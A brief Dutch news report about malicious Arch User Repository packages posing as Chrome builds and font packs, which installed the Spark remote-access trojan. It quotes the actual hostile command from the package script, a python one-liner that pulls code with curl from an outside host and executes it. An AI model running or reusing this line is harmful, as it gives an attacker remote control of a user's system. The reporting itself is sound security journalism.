In de AUR (Arch User Repository), dat wordt gebruikt in Arch Linux voor de distributie van pakketten van externe ontwikkelaars, is de publicatie van kwaadaardige code voortgezet, geïntegreerd in pakketten met niet-officiële versies van browsers. Naast de eerder twee weken geleden ontdekte kwaadaardige pakketten firefox-patch-bin, librewolf-fix-bin en zen-browser-patched-bin, is het pakket google-chrome-stable aan de AUR toegevoegd, dat ook een wijziging bevat die een schadelijk component installeert dat op afstand toegang tot het systeem biedt.
In het PKGBUILD-bestand van het problematische pakket werd de installatie van een script voor het uitvoeren van de browser google-chrome-stable.sh gedefinieerd, waarin onder andere het commando ‘python -c «$(curl https://segs.lol/9wUb1Z)»‘ aanwezig was, dat malware downloadde, herkend door de dienst VirusTotal als de trojan Spark, die op afstand beheer over het systeem mogelijk maakt, processen kan starten, bestanden kan overdragen, verkeer kan inspecteren en schermafbeeldingen kan versturen.
Het kwaadaardige pakket google-chrome-stable werd eergisteren gedownload en werd door de AUR-beheerders enkele uren na publicatie verwijderd. Bijna onmiddellijk na de verwijdering van google-chrome-stable werden er twee kwaadaardige pakketten in de AUR geüpload - ‘chrome’ en ‘chrome-bin’, die een vergelijkbaar script bevatten voor de installatie van malware op het systeem van de gebruiker.
Daarna werden er nog drie pakketten met kwaadaardige code ontdekt: ttf-mac-fonts-all, ttf-ms-fonts-all en gromit.
Bron: opennet.ru
